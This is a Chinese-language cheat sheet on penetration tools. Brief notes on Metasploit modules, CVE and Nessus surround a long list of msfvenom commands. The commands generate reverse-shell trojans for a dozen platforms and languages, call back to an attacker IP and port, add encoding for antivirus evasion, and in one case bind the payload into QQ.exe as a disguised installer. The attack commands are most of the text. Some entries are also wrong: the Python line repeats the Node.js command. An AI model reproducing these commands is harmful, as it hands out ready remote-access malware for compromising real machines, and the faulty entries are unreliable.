MSF
Metasploit Framework 开源工具,方便进行渗透测试。Ruby开发的
Auxiliaries(辅助模块):负责扫描、嗅探、指纹识别等功能
Exploit(漏洞利用模块):利用安全漏洞进行攻击行为
Payload(有效载荷模块):在渗透攻击之后,用于在目标系统上执行任意命令或者执行特定的代码
Post(后期渗透模块):用于在取得目标系统远程控制权限后,进行一系统的后渗透攻击动作
Encoders(编码工具模块):主要负责免杀
CVE
Common Vulnerabiluities & Exposures(公共漏洞和暴露)
为每个漏洞和暴露破了唯一的名称
给每个漏洞和暴露一个标准化的描述
不是一个数据库面,而是一个字典
任何完全迥异的漏洞库都可以用同一个语言表述
由于语言统一可以使得安全事件报告更好地被理解,实现更好的协调工作
可以成为评价相应工具和数据库的基准
MSF载荷选择
windows/meterpreter/reverse_tcp
java/meterpreter/reverse_tcp
php/meterpreter/reverse_tcp
php/meterpreter_reverse_tcp
ruby/shell_reverse_tcp
cmd/unix/interact
cmd/unix/reverse
cmd/unix/reverse_perl
cmd/unix/reverse_netcat_gaping
windows/meterpreter/reverse_nonx_tcp
windows/meterpreter/reverse_ord_tcp
windows/shell/reverse_tcp
generic/shell_reverse_tcp
msfvenom各平台木马生成
windows
msfvenom -a x86 —platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b ‘x00x0axff’ -i 3 -f exe -o payload.exe — 编码3次以exe输出, 输文件名字叫payload
msfvenom -a x86 —platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -x D:/QQ.exe -i 5 -f exe -o c:/QQ1.exe —附加在qq.exe上,进行5次编码后以exe文件输出,输出的名字叫qq1
mac
msfvenom -a x86 —platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f macho -o payload.macho
android
msfvenom -p android/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f apk -o payload.apk
powershell
msfvenom -a x86 —platform Windows -p windows/powershell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1
linux
msfvenom -a x86 —platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f elf -o payload.elf
php
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘n’ > shell.php && pbpaste >>shell.php
aspx
msfvenom -a x86 —platform windows -p windows/meterpreter/reverse_tcp LHOST= 攻击机IP LPORT=攻击机端口 -f aspx -o payload.aspx
jsp
msfvenom —platform java -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.jsp
war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.war
node js
msfvenom -p nodejs/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw –o payload.js
python
msfvenom -p nodejs/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw –o payload.js
perl
msfvenom -p cmd/unix/reverse_perl LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.pl
ruby
msfvenom -p ruby/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.rb
lua
msfvenom -p cmd/unix/reverse_lua LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.lua
windows shellCode
msfvenom -a x86 —platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c
Linux Shell
msfvenom -a x86 —platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c
mac shell
msfvenom -a x86 —platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IPLPORT=攻击机端口 -f c
Nessus
目前世界上最多人使用的系统漏洞扫描与分析软件
号称世界上最流行的漏洞扫描程序
Nessus提供了完整的漏洞扫描服务,并随时更新漏洞库。Nessus提供服务器和WEB客户端
安装过程 :https://blog.csdn.net/wwl012345/article/details/96998187